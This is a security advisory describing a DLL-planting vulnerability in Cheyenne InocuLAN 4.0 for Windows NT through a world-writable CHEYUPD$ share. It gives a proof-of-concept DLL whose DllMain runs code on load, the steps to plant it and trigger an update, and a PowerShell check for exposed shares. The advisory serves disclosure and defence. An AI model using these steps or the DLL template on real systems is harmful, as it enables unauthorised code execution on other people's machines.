
source: https://www.securityfocus.com/bid/106/info

It is possible to run arbitrary code on any Intel machine running Cheyenne Inoculan version 4.0 for Windows NT prior to SP2.

Inoculan runs as a service, called "Cheyenne InocuLAN Anti-Virus Server".

When it starts, it replaces any shared directory with the same name and shares "CHEYUPD$" with full control for the Everyone group.

When the service starts, it does an update check in this directory (usually "C:\Inoculan\Update\") using the files "<NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt" and [idem]...\avh32dll.dll

Simply "touching" or modifying the file "filelist.txt" to look younger than it really is causes the update. The update causes the service to stop, the avh32dll.dll DLL to replace the existing one (usually in c:\inoculan\avh32dll.dll) and then starts the service again.

When the service starts, it loads the DLL into memory, and THEN does a lot of stuff (including checking if it is a valid DLL, I presume).

You can write a DLL that executes arbitrary code at the time it is loaded in memory, at the precise time when DllMain is called by the image loader, before any other function has a chance to be called.

To check if you are vulnerable, if you have the Resource Kit installed, run

SRVCHECK.EXE \\<YourMachine>

else run srvmgr.exe from an NT server on the same domain, select <YourMachine> and select "Computer|Shared Directories".

If there is a shared directory called "CHEYUPD$" that allows "FULL CONTROL" to the "EVERYONE" group, you are vulnerable.
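A present-day equivalent of that check, added here and not part of the original advisory: it lists every share on the local machine whose ACL grants Full control to the Everyone group, flagging CHEYUPD$ in particular. It assumes the SmbShare module (Windows 8 / Server 2012 or later) and an administrator session; the function name is my own.

```powershell
# Added example (not from the original advisory): report shares that grant
# the Everyone group Full control, which is the condition the advisory
# describes for the CHEYUPD$ share. Requires the SmbShare module
# (Windows 8 / Server 2012 and later) and a local administrator session.
function Find-EveryoneFullControlShare {
    [CmdletBinding()]
    param(
        # Share names of particular interest; CHEYUPD$ is the one from the advisory.
        [string[]] $WatchList = @('CHEYUPD$')
    )

    foreach ($share in Get-SmbShare) {
        # One entry per ACE: AccountName, AccessControlType (Allow/Deny),
        # AccessRight (Full/Change/Read/Custom).
        $aces = Get-SmbShareAccess -Name $share.Name -ErrorAction SilentlyContinue
        foreach ($ace in $aces) {
            # Match the well-known group by name or by its SID (S-1-1-0).
            $isEveryone = ($ace.AccountName -eq 'Everyone') -or ($ace.AccountName -eq 'S-1-1-0')
            if ($isEveryone -and $ace.AccessControlType -eq 'Allow' -and $ace.AccessRight -eq 'Full') {
                [pscustomobject]@{
                    Name        = $share.Name
                    Path        = $share.Path
                    OnWatchList = ($WatchList -contains $share.Name)
                    Account     = $ace.AccountName
                    Right       = $ace.AccessRight
                }
            }
        }
    }
}

# Any row with OnWatchList = True is exactly the condition the advisory describes;
# the remaining rows are other Everyone/Full shares worth reviewing.
Find-EveryoneFullControlShare | Format-Table -AutoSize
```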

An interesting point is that Inoculan uses "domains". In one domain, a single server forwards the updates to all machines participating in that "domain" (nothing to do with NT domains). It may be possible to write the trojan DLL to the domain server's CHEYUPD$ shared directory and have the server copy it to all the machines in the domain.

inoctroj.cpp:

-------Cut here -----------
#include <windows.h>
#include <stdio.h>
#include <string.h>

// Entry point the image loader calls as soon as the DLL is mapped,
// before any exported function can be called.
BOOL WINAPI DllMain (HINSTANCE, DWORD, LPVOID)
{
    // Any code can go here. This is an example:
    // what it does is simply create a file in the root of the C: drive
    // and write "hello world !" inside it.
    FILE * demo;

    // create a file
    demo = fopen ( "C:\\I_can_write_a_file.txt", "w");
    if (demo == NULL)
        return FALSE;

    // write to the file
    const char * buf = "hello world ! ";
    fwrite ( buf, 1, strlen(buf), demo);
    fclose ( demo );

    // Returning FALSE aborts the DLL loading. Anyway, we're done at that time ;))
    return FALSE;
}
-------Cut here -----------

Compile and link to make the target avh32dll.dll. Write it to <NtBox>\CHEYUPD$\English\NtIntel\Ready\, touch <NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt to be newer than it currently is. Wait for the user to stop and restart the InocuLAN server, or for them to reboot.